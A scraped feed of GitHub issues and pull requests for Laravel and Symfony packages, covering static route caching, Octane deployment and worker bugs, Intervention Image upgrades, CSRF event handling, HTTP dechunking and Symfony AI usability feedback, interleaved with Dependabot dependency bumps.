  • PHP 8.4 + Inertia 2 + Livewire 4: passed
  • PHP 8.4 + Inertia 3 + Livewire 3: passed
  • PHP 8.4 + Inertia 3 + Livewire 4: passed
  • PHP 8.5 + Inertia 2 + Livewire 3: passed
  • PHP 8.5 + Inertia 2 + Livewire 4: passed
  • PHP 8.5 + Inertia 3 + Livewire 3: passed
  • PHP 8.5 + Inertia 3 + Livewire 4: passed

Inertia 1 was not installable with Laravel 13.x because inertiajs/inertia-laravel 1.x only allows Laravel 8-12. Inertia 1 was also not installable on PHP 8.5 because it only allows PHP through 8.4.

Tests

  • vendor/bin/phpunit tests/Routing/RouteStaticMethodTest.php tests/Http/Middleware/CacheStaticResponseTest.php tests/Integration/Routing/RouteStaticResponseTest.php tests/Foundation/Http/KernelTest.php
  • vendor/bin/phpunit tests/Routing/RoutingRouteTest.php tests/Http/Middleware/CacheTest.php
  • vendor/bin/pint config/cache.php src/Illuminate/Foundation/Http/Kernel.php src/Illuminate/Routing/Route.php src/Illuminate/Routing/Router.php src/Illuminate/Routing/Middleware/CacheStaticResponse.php tests/Foundation/Http/KernelTest.php tests/Routing/RouteStaticMethodTest.php tests/Http/Middleware/CacheStaticResponseTest.php tests/Integration/Routing/RouteStaticResponseTest.php
View more
2 comments 👍 1
DGarbs51

DGarbs51

27th May 2026 @ 03:02

dependencies php

Bumps spatie/laravel-openapi-cli from 1.3.0 to 1.3.1.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

1st Jul 2026 @ 08:37

In nelmio/alice, I use SYMFONY_REQUIRE to test various Symfony versions.

In https://github.com/nelmio/alice/pull/1324, I added a build for SYMFONY_REQUIRE="8.*", yet some Symfony7 dependencies were still installed:

https://github.com/nelmio/alice/actions/runs/20063055922/job/57545083895?pr=1324#step:7:30

This was caused by me missing to allow a dependency for Symfony 8, hence symfony/framework-bundle couldn't be installed in v8, but the others that could were.

I assumed the Symfony require would enforce the required version, i.e. that if the constraints failed it would fail entirely, rather than bypassing the constraint if it can.

Is my assumption correct, i.e. it is a bug somewhere either in Flex or my setup, or is it the expected result?

View more
3 comments
theofidry

theofidry

16th Dec 2025 @ 07:11

This PR introduces support for generating Invokable Commands and interactively will ask to provide options and arguments for the command just as the make:entity would. Currently it is supporting the Symfony 7.3 specification of functionalities.

If the kernel version is below 7.3 it will hide any invokable functionality. If the Kernel version supports invokable commands it will swap over to the invokable system. A user can use --no-invokable to revert back to the inheritance based command.

I see that the invokable generation is duplicated by PR #1746, I'll keep this PR open to support interactivity in generating the command in it's entirety

Some screenshots of the generation process:

Which would in turn generate a command looking like:

View more
5 comments 🎉 2
Kefisu

Kefisu

29th Nov 2025 @ 10:35

Cropperjs

Follow-up to #3394.

Context

symfony/ux-cropperjs currently requires intervention/image: ^2.5. The v2 line is legacy (PHP 5.4-era) and triggers the indirect deprecations reported in #3394. As noted there, upgrading isn't a drop-in bump: from Intervention v3+, ImageManager no longer accepts an implicit driver-name string — it requires a DriverInterface — which left an open design question: adopt Intervention's official Symfony integration, or let the bundle expose driver selection itself?

Proposal

Upgrade straight to Intervention Image v4 (^4.0, dropping v2) and let users choose the driver via bundle config:

# config/packages/cropperjs.yaml
cropperjs:
    driver: gd            # gd (default), imagick or vips
    driver_service: ~     # optional: a custom Intervention DriverInterface service (takes precedence)
  • The ImageManager service is built via ImageManager::usingDriver(...).
  • gd/imagick ship with intervention/image; vips uses the official intervention/image-driver-vips package, listed under composer suggest (it needs libvips + ext-ffi). Selecting vips without that package fails fast with an actionable message.
  • driver_service is an escape hatch for a fully custom / pre-configured DriverInterface.

Why v4 (not v3): a single major to maintain, the vips driver is v4-only, and the bundle already requires PHP >= 8.4 (v4 needs >= 8.3). The Crop API maps cleanly: make() -> decodeBinary(), resize(closure) -> scaleDown(), encode() + getEncoded() -> encodeUsingFileExtension().

Backward compatibility: the bundle's public API is unchanged and gd stays the zero-config default, so existing apps are unaffected.

Reference implementation

A working branch (migration + config + docs + tests parameterized over gd & imagick): https://github.com/deluxetom/ux/tree/cropperjs-intervention-v4

Happy to open a PR if this direction looks good — or to adjust if the official-integration route is preferred instead.

View more
deluxetom

deluxetom

11th Jun 2026 @ 21:25

Twig
Q A
Feature PR symfony/symfony#60334
PR author(s) @Oviglo
Merged in 8.1

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.1 branch in the symfony-docs repository.

Thank you! :smiley:

View more
1 comment
welcoMattic

welcoMattic

27th Mar 2026 @ 14:13

MCP Bundle RFC Feature

Not sure if already possible but I didn't find any info in the docs about permissions and certain tools for certain users so I might have missed this - if so, then I apologize! Imagine building an app where you want MCP support for your own backend but you also want to provide MCP support for your customers in the frontend. So in your Symfony security configuration you'd have something along the lines of

security:
  providers:
    backend_users:
      entity:
        class: App\Entity\BackendUser
        property: email

    frontend_users:
      entity:
        class: App\Entity\User
        property: email

  firewalls:
    backend:
      pattern: ^/backend(?:/|$)
      lazy: true
      provider: x

    main:
      lazy: true
      provider: backend_users

...

The different providers don't even matter but you get the point, you'd wan't to have /backend/mcp and /mcp to provide different tools for different users with different permissions.

Thanks for working hard on AI stuff in Symfony ❤️

View more
4 comments 👍 1
Toflar

Toflar

7th Jul 2026 @ 11:17

Feature

I thought Symfony needed some Aurelia love :)

I'm fairly new to Webpack so any feedback is welcomed

As Aurelia leverages dynamic modules, exposing the module resolve configuration let's the Aurelia Plugin work properly.

Aurelia also uses .html for templating as the standard option, so added in a rule for .html if the Aurelia plugin is enabled.

Will work on an example shortly :)

View more
2 comments
tomtomau

tomtomau

25th Jan 2018 @ 11:24

View more
4 comments
Mynyx

Mynyx

14th Apr 2026 @ 09:49

Summary

Backports the Route::static() documentation from the Laravel 13.x docs PR to Laravel 12.x.

The new routing.md section covers:

  • basic ->static() usage with shared and browser TTL overrides,
  • default config/cache.php options,
  • response and middleware behavior,
  • when not to use static routes,
  • Inertia behavior,
  • Livewire compatibility,
  • the CDN / Cloudflare Cache Rule caveat.

Backport Notes

The Laravel 13.x docs use Illuminate\Foundation\Http\Middleware\PreventRequestForgery in the default config example. Laravel 12.x uses Illuminate\Foundation\Http\Middleware\ValidateCsrfToken, so this backport adjusts the example accordingly.

Related PRs

Compatibility Verification

The framework backport PR includes app-level matrix verification across PHP 8.4 / 8.5, Inertia 1 / 2 / 3, and Livewire 3 / 4 for Laravel 12.x where Composer constraints permit those combinations.

Testing

Documentation-only change.

View more
DGarbs51

DGarbs51

27th May 2026 @ 04:14

Status: Waiting Feedback

Hello everyone,

I am using this code below to add a dropdown button. When I press this button, I see that something responds in the developer console, but nothing actually opens in the view.

<button type="button" class="btn btn-sm dropdown-toggle dropdown-toggle-split" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                        <span class="sr-only">Open</span>
                    </button>

until i comment out the stimulus loader.

// export const app = startStimulusApp(
//    require.context(
//        "@symfony/stimulus-bridge/lazy-controller-loader!./controllers",
//        true,
//        /\.([jt])sx?$/,
//    ),
// );

then i can use the dropdowns. i'm suffering. any help is very welcome. thank you!


  • bootstrap: v5.3.6
  • symfony/stimulus-bundle: 2.25
  • typescript: 5.3.3
  • @symfony/webpack-encore: 4.7.0
View more
2 comments
ralusnom

ralusnom

26th May 2025 @ 19:20

Q A
Issues Companion to symfony/ux#3486
License MIT

Companion PR to symfony/ux#3468. Adds the Toolkit/Shadcn docs page for the menubar recipe.

Kept as draft until symfony/ux#3468 (which introduces the upstream recipe) is merged.

Split out from the original #54 so each component can be reviewed/merged independently alongside its upstream recipe.

View more
1 comment
Amoifr

Amoifr

18th Apr 2026 @ 14:20

Hi all!

I don't know how to call it but is it possible and if is worth of effort to create a "local" MCP server for make:* command?

It would be nice if agent can use make:* commands to create a real (and good) object as command can do. With this we're sure that new entity is working and an entity mapping is up to date.

For example command make:entity ask many questions and would be nice to have make:entity --schema-file=... or MCP.

Maybe it's a feature for symfony cli like symfony run:mcp make?

View more
8 comments ❤️ 1
d0niek

d0niek

25th Nov 2025 @ 15:09

Summary

Illuminate\Image\Image::toFormat() currently only supports converting to webp, jpg, and jpeg, even though the underlying Intervention Image encoders for png, gif, avif, and bmp are already bundled and used elsewhere in the driver (MediaTypeEncoder fallback). This adds first-class fluent methods for the missing formats, following the exact same pattern as the existing ones.

  • Image::toPng()
  • Image::toGif()
  • Image::toAvif()
  • Image::toBmp()
use Illuminate\Support\Facades\Image;

// Before: only webp/jpg/jpeg were reachable through toFormat()
Image::fromUpload($request->file('avatar'))
    ->cover(400, 400)
    ->toWebp()
    ->store('avatars');

// Now also possible:
Image::fromUpload($request->file('avatar'))
    ->cover(400, 400)
    ->toAvif()
    ->quality(80)
    ->store('avatars'); // stored with the correct .avif extension

Image::fromPath(storage_path('app/logo.png'))
    ->toGif()
    ->toBase64();

Image::fromUpload($request->file('scan'))
    ->toBmp()
    ->toDataUri();

Also fixes Image::extension(), which was missing the image/avif MIME type mapping and would have produced a .bin extension for AVIF outputs stored via store()/storeAs().

View more
1 comment
Tresor-Kasenda

Tresor-Kasenda

9th Jul 2026 @ 10:25

Summary

This is a major refactor that modernizes the package for Laravel 11+ and implements full RFC 8058 one-click unsubscribe compliance. The changes improve URL structure, add support for multiple notifiable model types, and enhance testing capabilities.

Key Changes

  • RFC 8058 Compliance: Added List-Unsubscribe-Post: List-Unsubscribe=One-Click header to all emails and updated the unsubscribe route to accept both GET and POST requests. POST requests return 204 No Content for one-click unsubscribe from email clients.

  • Morph Map Support: Replaced the single userModel configuration with Laravel's built-in morph map system. Unsubscribe URLs now use {subscriberType}/{subscriberId} instead of {subscriber}, allowing multiple notifiable model types to coexist. The controller resolves the model class using Relation::getMorphedModel().

  • Enum Support for Mailing Lists: Updated AppliesToMailingList::usesMailingList() return type to accept string|\BackedEnum, allowing type-safe mailing list definitions via backed enums.

  • Testing Improvements: Added FakeSubscriber class with assertion methods (assertUnsubscribedFromMailingList(), assertUnsubscribedFromAll(), assertNothingUnsubscribed()) and control methods (alwaysSubscribed(), alwaysUnsubscribed()) for easier testing without real handlers.

  • Documentation Overhaul: Completely rewrote README with clearer setup instructions, modern Laravel conventions (bootstrap/providers.php), and comprehensive examples including enum usage and testing patterns.

  • Removed Legacy Code: Eliminated the userModel() method and configuration from Subscriber and SubscribableApplicationServiceProvider, simplifying the API.

  • Updated URL Generation: Modified MailSubscriber::unsubscribeLink() to use getMorphClass() and getRouteKey() for proper model identification in signed URLs.

Implementation Details

  • The unsubscribe controller now validates the model type exists in the morph map before attempting to retrieve the model, improving security.
  • Mailing list values are extracted via a new mailingListValue() helper that handles both string and enum types.
  • The service provider stub was simplified to remove model configuration.
  • All tests were updated to use the new URL structure and removed references to userModel() configuration.

https://claude.ai/code/session_01R4pAjWwGY8xKspsdU8xnsy

View more
peterfox

peterfox

26th May 2026 @ 13:42

help wanted findapr

symfony 7.4 php 8.5

Development is taking place on IIS, in the "Symfony" folder. Instead of the address "/Symfony/vendor/flasher/flasher.min.js" like other resources embedded via "asset," the address "/vendor/flasher/flasher.min.js" is inserted, which results in an error. The CSS file isn't embedded at all.

View more
2 comments
yaroslaw74

yaroslaw74

12th Apr 2026 @ 16:01

Hi there!

While working on Firefox log capturing for a project (basically it requires setting devtools.console.stdout.content as moz:firefoxOptions > pref) I discovered the FirefoxManager behavior regarding options merging looked strange: as soon as one sets the moz:firefoxOptions almost all the automation is gone (binary, args, and default prefs are gone).

While redefining most of them could be okay, this makes configuration via environment variables inoperant out of the blue, which is not in sync with how ChromeManager works. This also drops the sensible defaults FirefoxOptions.

This MR tries to address this issue.

It is not easy (or even possible) to introspect the moz:firefoxOptions sent to the browser by connecting to it. I didn't find anywhere to hook into the library to check our required capabilities. This is why I took the liberty to introduce a new private method and access it via the reflection in the test suite. This is not the best but I don't see another way atm. Any suggestion is welcome!

(PS: I also added some basic tests for the FirefoxManager based on the ChomeManager ones)

View more
👍 2
tucksaun

tucksaun

5th Mar 2025 @ 15:02

Octane Version

2.13

Laravel Version

12.39.0

PHP Version

8.3.6

What server type are you using?

Roadrunner

Server Version

2.6

Database Driver & Version

mysql 8.0.43

Description

doing login and the result is, sometimes the see i'm as logged in and sometime not.

I am manualy making auth, the login like this:

<?php

namespace App\Http\Controllers\Auth;

use App\Dto\LoginDto;
use App\Http\Controllers\Controller;
use App\Http\Requests\LoginRequest;
use App\Service\LoginService;
use Illuminate\Auth\Access\AuthorizationException;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Auth;
use Inertia\Inertia;

class LoginController extends Controller
{

    public function __construct(
        private LoginService $loginService
    ) {
    }

    public function page()
    {
        return Inertia::render("auth/Login");
    }

    public function login(LoginRequest $request)
    {
        $safe = $request->safe();
        /* @var User|null */
        $user = $this->loginService->login(new LoginDto($safe->username, $safe->password));
        if (!$user) {
            return back()->withErrors([
                'username' => 'Username atau Password Salah',
                'password' => 'Username atau Password Salah',
            ]);
        }
        $request->session()->regenerate();
        Auth::login($user);
        return redirect()->route('home');
    }
}

and to debug what happened i'm trying make this:

Route::get("/inspect", function (Request $request) {
    return response()->json([
        'user' => $request->user(),
        'session' => $request->session()->all()
    ]);
});

and you know, i'm had trying refresh on /inspect multiple time, and i see that the $user is sometime exists and some time not. I suspect that the issue from the roadrunner that store $user with Auth::login($user) persistently in single worker and not making other worker had access to the $user (why i say it store persistenly, cause i'm already doing experiment, when i delete all cookie from browser manually then i'm still loggen in).

Steps To Reproduce

just try making login as usually with Auth::login() on octane + roadrunner.

View more
1 comment
juntralala

juntralala

11th Dec 2025 @ 12:28

help wanted

Octane Version

2.8.1

Laravel Version

10.48.28

PHP Version

8.3.16

What server type are you using?

Swoole

Server Version

6.0.1

Database Driver & Version

No response

Description

I'm using Envoyer to deploy a Laravel Octane application, taking advantage of its zero-downtime deployment features.

However, Octane currently does not support zero-downtime deployment because it does not follow symlink directories. It always remains in the actual directory (instead of the symlinked one) where the Octane server was initially started. When the outdated release directory is deleted, Octane continues running in that location, causing errors on every request and resulting in 500 response codes on the live application.

Error thrown:

Warning: require(/var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/bootstrap.php): Failed to open stream: No such file or directory in /var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/swoole-server on line 18
Fatal error: Uncaught Error: Failed opening required '/var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/bootstrap.php' (include_path='.:/usr/bin/[email protected]/8.3.16/share/[email protected]/pear') in /var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/swoole-server:18
Stack trace:
#0 /var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/swoole-server(95): {closure}(Array)
#1 [internal function]: {closure}(Object(Swoole\Http\Server), 0)
#2 /var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/swoole-server(170): Swoole\Server->start()
#3 {main}
  thrown in /var/www/domain.com/releases/202502010200023/vendor/laravel/octane/bin/swoole-server on line 18
#1 [internal function]: {closure}(Object(Swoole\Http\Server), 1)
#1 [internal function]: {closure}(Object(Swoole\Http\Server), 3)
#1 [internal function]: {closure}(Object(Swoole\Http\Server), 2)
#1 [internal function]: {closure}(Object(Swoole\Http\Server), 4)
#1 [internal function]: {closure}(Object(Swoole\Http\Server), 5)

Steps To Reproduce

Use any 0-downtime deployment or test it manually using the following instructions:

  1. Use the Swoole driver as an example.
  2. cd one directory up from the project's base path.
  3. Create a current symlink directory for your project using the command: ln -nsf ./octane-project-test ./current
  4. Start the Octane server: php ./current/artisan octane:start
  5. Copy your project to another directory: cp -R ./octane-project-test ./octane-project-test-new
  6. Activate the new release: ln -nsf ./octane-project-test-new ./current
  7. Reload the Octane server: php ./current/artisan octane:reload
  8. Remove the original project directory: rm -rf ./octane-project-test
View more
24 comments 👍 2 👀 2
mikkpokk

mikkpokk

2nd Mar 2025 @ 01:35

help wanted

Octane Version

2.13.1

Laravel Version

12.38.1

PHP Version

8.4.14

What server type are you using?

Swoole

Server Version

nginx

Database Driver & Version

No response

Description

When registering a singleton via AppServiceProvider, the constructor is triggered only once per worker, as expected. However, when using the attribute-based singleton registration (https://laravel.com/docs/12.x/container#singleton-attribute ), the constructor appears to be triggered once per request scope, behaving more like a scoped service. This may be due to the sandbox being registered earlier.

Steps To Reproduce

Check running this part

namespace App\TestService;

use Illuminate\Container\Attributes\Singleton;

#[Singleton]
class TestService
{
    public function __construct()
    {
        echo("__construct TestService");
        echo(spl_object_id($this));
    }
}

in some controler use

app(\App\TestService\TestService::class);
app(\App\TestService\TestService::class);
app(\App\TestService\TestService::class);
View more
2 comments
kamil-michalak

kamil-michalak

15th Nov 2025 @ 10:56

dependencies javascript

Bumps lodash from 4.17.23 to 4.18.1.

Dependabot compatibility score

You can trigger a rebase of this PR by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the Security Alerts page.

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
1 comment
dependabot[bot]

dependabot[bot]

10th Apr 2026 @ 03:44

The documentation examples pass title as the 2nd argument to flash()->success() and flash()->error(), but the actual method signature is:

success(string $message, array $options = [], ?string $title = null)

This causes the title string to be silently treated as $options, resulting in no title being displayed.

Fixed in three places:

  • Title.php example (Usage section)
  • PostController.php example (CRUD section)
  • AdminAccessMiddleware.php example (Middleware section)
View more
malitkn

malitkn

8th May 2026 @ 21:10

GitHub Codespaces is a good solution to run and try modifying the application without installing anything the desktop. Part of the support was added by https://github.com/symfony/demo/pull/1369

But it doesn't work anymore, we get the following message when starting a codespace.

This codespace is currently running in recovery mode due to a configuration error. Please review the creation logs, update your dev container configuration as needed, and run the "Rebuild Container" command to rectify.

What we need to achieve with codespace:

View more
11 comments
GromNaN

GromNaN

5th Dec 2024 @ 13:49

more information needed

I can't create an incident template, no matter which engine I choose. This is not happening in your demo. Not sure what is missing in my installation.

"twig " is not a valid backing value for enum Cachet\Enums\IncidentTemplateEngineEnum "blade " is not a valid backing value for enum Cachet\Enums\IncidentTemplateEngineEnum PHP 8.3.6 — Laravel 11.44.1

Image

View more
7 comments
julianstolp

julianstolp

19th Mar 2025 @ 12:56

make it easy for those of us who click on that little copy icon..

View more
tacman

tacman

4th Feb 2026 @ 16:48

hasPR
Q A
Feature PR symfony/symfony#63778
PR author(s) @fabpot
Merged in 8.1

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.1 branch in the symfony-docs repository.

Thank you! :smiley:

View more
1 comment
nicolas-grekas

nicolas-grekas

29th Apr 2026 @ 08:20

To fix the deprecation warning in PHP 8.4, replace enable_lazy_ghost_objects: true with enable_native_lazy_objects: true in your doctrine.yaml configuration file.

View more
1 comment
lxregistry

lxregistry

6th Aug 2025 @ 10:58

This is related to PR https://github.com/ash-jc-allen/short-url/pull/290, but is a slimmer approach to decreasing the likelihood of collisions. This means that two or more queued jobs attempting to create Short URL's at the same time will have to execute at the same microsecond to generate the same short URL key (very unlikely).

View more
6 comments ❤️ 1
stevebauman

stevebauman

23rd Jul 2024 @ 15:51

when I want to create simple entity I have the error : symfony console make:entity Please run "composer require symfony/mercure". It is needed to broadcast entities

How to make without mercure ?

View more
1 comment
stloc

stloc

4th Mar 2024 @ 17:03

Status: Needs Review HttpClient
Q A
Branch? 6.4
Bug fix? no
New feature? no
Deprecations? no
Issues -
License MIT

The native dechunk stream filter is likely going to be deprecated in a future version of PHP. This PR removes our reliance on it by introducing Internal\Dechunker, a pure PHP incremental decoder for chunked transfer encoding, and uses it to decode chunked request bodies in HttpClientTrait and chunked responses in NativeResponse.

The decoder mirrors the state machine of the native filter, including its tolerances: bare LF line endings, chunk extensions, leading zeros in chunk sizes, and ignored trailer fields. Parity was verified by fuzzing it against the native filter with randomly generated chunked bodies split at random read boundaries, producing byte-identical output.

Two behavior improvements come with the switch:

  • a malformed chunked response now fails with a TransportException at the first malformed byte, while the native filter used to switch to passthrough mode, streaming raw chunked data to the consumer and failing only at EOF;
  • NativeResponse no longer needs its php://temp buffer, removing a write/read round-trip per network read for all responses.
View more
nicolas-grekas

nicolas-grekas

13th Jul 2026 @ 16:51

Adds an API entry under the available starter kits and a dedicated section covering token-based authentication with Sanctum, the included endpoints, API versioning via the X-API-Version header, and the Scalar/Scramble API reference. Also updates the introduction, authentication, and teams sections to reflect that the API kit uses Sanctum instead of Fortify and supports teams through endpoints rather than screens.

View more
WendellAdriel

WendellAdriel

14th Jul 2026 @ 16:22

View more
👍 1
sertxudev

sertxudev

1st Jan 2026 @ 20:20

First of all, thank you for the great work on the CSRF protection functionality in the csrf_protection_controller.js script. It’s a fantastic addition, and it works really well for handling traditional form submissions.

However, I’ve encountered an issue when using this CSRF protection in the context of fetch requests (without Turbo). Specifically, I found that the CSRF token is not always applied correctly when sending fetch requests, as the event listener for the form submission may be executed before the CSRF logic in csrf_protection_controller.js is applied.

In the current implementation, the CSRF token is injected into the form submission when the submit event is captured :

// csrf_protection_controller.js
document.addEventListener('submit', function (event) {
    // CSRF protection logic
});

This works fine when the form is submitted in the traditional way. However, when using fetch (with custom AJAX logic), I encountered an issue where the CSRF protection logic is executed after the fetch request is sent, which results in the CSRF token not being updated in time.

Here’s an example that illustrates the problem :

document.addEventListener('submit', function (event) {
	if (event.target.matches('form[data-toggle="ajax-form"]')) {
	  event.preventDefault()
	  // Send request with fetch
	}
})

Depending on the order of event listener registration, the event that triggers the fetch request can be executed before the csrf_protection_controller.js event listener. This is exactly what happens in my case, as my event listener is registered during the DOMContentLoaded event, which causes it to run before the CSRF protection logic is applied.

To fix this issue, I used the capture phase (true as the third argument in addEventListener) to ensure that the CSRF protection logic is executed before the fetch request is sent.

// csrf_protection_controller.js
document.addEventListener('submit', function (event) {
    // CSRF protection logic
}, true);  // Using the capture phase to ensure this runs first

Why is the capture phase not used by default in the script? I believe this would help ensure the CSRF token is updated before the form is submitted, especially in cases where fetch is used.

Additionally, I noticed that the CSRF logic in csrf_protection_controller.js is tightly coupled with form submissions with Turbo. However, when using fetch (without Turbo), the same functionality is required — updating the CSRF token — but the existing solution works specifically for Turbo requests. This creates the need for duplication of code to handle CSRF protection in the same way for fetch requests.

It would be more efficient to refactor the CSRF protection logic in csrf_protection_controller.js into reusable JavaScript functions that could be invoked depending on the environment (e.g., when handling fetch requests). This way, the CSRF protection logic for Turbo can be reused without duplicating code, allowing developers to call the relevant functions as needed based on their specific use case.

I’d love to hear your thoughts on whether this approach makes sense and if there are any suggestions for improving this workflow, particularly for fetch requests.

Happy Holidays !

View more
5 comments
hlecorche

hlecorche

24th Dec 2024 @ 11:00

This PR adds the ability to customize the HTTP status code of the response a data object produces, without leaving the data object's fluent API.

Since #291, calculateResponseStatus() returns 201 CREATED for POST requests and 200 OK otherwise. Sometimes that guess is what we need: a POST that queues work for later should answer 202 Accepted, a POST-based search endpoint answers 200 OK. Correcting it per call site forces an early type-drop from Data to Response:

// Before: converted to a response manually, losing the Data type
return UserData::from($user)
    ->toResponse($request)
    ->setStatusCode(202);

This was previously proposed in #891 and closed because it added a status property to every data object. This PR stores the status on the DataContext instead, where wrap() already keeps its per-instance response state, so data objects gain no new properties:

// After: stays a Data object all the way down
return UserData::from($user)->responseStatus(202);

A class-level default can be set with a defaultResponseStatus method, mirroring defaultWrap:

class UserData extends Data
{
    public function defaultResponseStatus(): int
    {
        return 202;
    }
}

A status chained on the instance wins over the class default, which wins over the POST heuristic.

View more
raphaelbcunha

raphaelbcunha

8th Jul 2026 @ 21:55

I recently started building a foundational CLI tool using the new Symfony AI component, and I deliberately chose an "Error-Driven Development" approach—navigating the implementation without looking at the documentation beforehand to test the intuitiveness of the DX.

While the final result is elegant, the onboarding friction for a task as simple as "send a prompt and get a response" highlighted several critical pitfalls. Here is the breakdown of the DX journey and where we can improve it.


The Goal

Create a simple Symfony command that takes a user question, sends it to a LLM platform (like Gemini), and displays the output.

Initial Intuitive Implementation

Based on typical IDE autocompletion and intuitive naming, one might naturally write this:

#[AsCommand(
    name: 'app:ai:ping',
    description: 'Ping an AI model with a simple question',
)]
class AiPingCommand extends Command
{
    public function __construct(
        private readonly PlatformInterface $platform
    ) {
        parent::__construct();
    }

    protected function configure(): void
    {
        $this
            ->addArgument('question', InputArgument::REQUIRED, 'The question to ask the AI')
            ->addOption('model', null, InputOption::VALUE_REQUIRED, 'The model to use', 'gemini-2.5-flash')
        ;
    }

    protected function execute(InputInterface $input, OutputInterface $output): int
    {
        // Intuitively passing the string argument directly
        $result = $this->platform->invoke($input->getOption('model'), $input->getArgument('question'));

        dd($result);

        return Command::SUCCESS;
    }
}


The Pitfalls

1. Misleading API Signatures (String vs. Array)

Passing a raw string failed. Attempting to wrap it in an array ([$input->getArgument('question')]) to satisfy potential iterable expectations moved us to the next error, but the signature didn't clearly guard against this at the PHP level.

I have no name! /var/www bin/console app:ai:ping "salut, comment ca va?"

In ModelClient.php line 52:
                                                                                                               
  Payload must be an array, but a string was given to "Symfony\AI\Platform\Bridge\Gemini\Gemini\ModelClient".  
                                                                                                               

app:ai:ping [--model MODEL] [--] <question>

2. Side-Effects when Debugging with dd()

When trying to dump the $result (which returns a DeferredResult), Symfony's internal HttpClient threw a cryptic streaming error:

In AsyncResponse.php line 291:
  Instance of "Symfony\Component\HttpClient\Response\TraceableResponse" is already consumed 
  and cannot be managed by "Symfony\Component\HttpClient\Response\AsyncResponse".

DX Issue: A developer trying to inspect what the platform returned is met with an internal HttpClient lifecycle exception instead of a clean representation of a deferred response.

3. Cryptic Vendor Errors with asText()

To bypass the dump error, the next logical step was calling ->asText() on the result:

dd($result->asText());

This resulted in a low-level API error passed down from the LLM provider (Gemini):

In HttpStatusErrorHandlingTrait.php line 51:
  Invalid JSON payload received. Unknown name "": Root element must be a message.

DX Issue: The component allowed an invalid payload structure to be sent all the way to the remote API, resulting in a cloud provider error rather than a local validation exception (e.g., "The payload must be an instance of MessageBag...").


The Working Solution

To make it work seamlessly, the raw input must be explicitly mapped into a MessageBag containing domain-specific Message objects:

protected function execute(InputInterface $input, OutputInterface $output): int
{
    $messages = new MessageBag(
        Message::forSystem('You are a pirate and you write funny.'),
        Message::ofUser($input->getArgument('question')),
    );

    $result = $this->platform->invoke($input->getOption('model'), $messages);

    $output->writeln($result->asText());

    return Command::SUCCESS;
}


Suggestions for DX Improvements

To make Symfony AI truly "copy-pasteable" for simple use cases and friendly to Error-Driven Development, we should consider tackling these three areas:

  • Polymorphic Arguments or Helper Methods: Allow PlatformInterface::invoke() to natively accept a raw string for simple single-user-prompt use cases, wrapping it into a MessageBag behind the scenes.
  • Fail Fast with Local Exceptions: Validate the payload structure before hitting the remote HTTP client. If invoke() receives an invalid format, throw a clear InvalidArgumentException explaining that a MessageBag or valid message array is required.
  • Safe Debugging / VarDumper Integration: Ensure DeferredResult can be safely inspected via dd() or dump() without accidentally breaking the underlying AsyncResponse stream state.
View more
3 comments
lyrixx

lyrixx

7th Jul 2026 @ 17:48

Octane Version

2.17.1

Laravel Version

13

PHP Version

8.5

What server type are you using?

Swoole

Server Version

6.0

Database Driver & Version

No response

Description

The fix for #962 (glob support removed in chokidar v4) only checks version.startsWith('4.') in bin/file-watcher.cjs line 8. Chokidar v5 also removed glob support, so the path extraction and ignored filter never activate when chokidar v5 is installed.

This means wildcard watch paths like app-modules/**/*.php or config/**/*.php are passed as raw globs to chokidar v5, which silently ignores them. Only plain directory paths (e.g. app, routes) work.

The version check should use a semver comparison (>= 4) rather than a string prefix check.

Steps To Reproduce

  1. Install chokidar v5 (npm install chokidar@^5.0.0)
  2. Keep the default config/octane.php watch paths (which include config/**/*.php, database/**/*.php, etc.)
  3. Run octane:start --watch
  4. Modify a file in config/ - no reload
  5. Modify a file in app/ (no glob) - reload works
  6. Change config/**/*.php to config in the watch array - reload now works for config changes

Suggested Fix

In bin/file-watcher.cjs, change:

const chokidarVersion4 = require(chokidarPackagePath).version.startsWith('4.');

To something like:

const chokidarMajor = parseInt(require(chokidarPackagePath).version.split('.')[0], 10);
const chokidarVersion4 = chokidarMajor >= 4;
View more
mikerockett

mikerockett

12th Apr 2026 @ 13:10

dependencies github_actions

Bumps actions/cache from 4 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
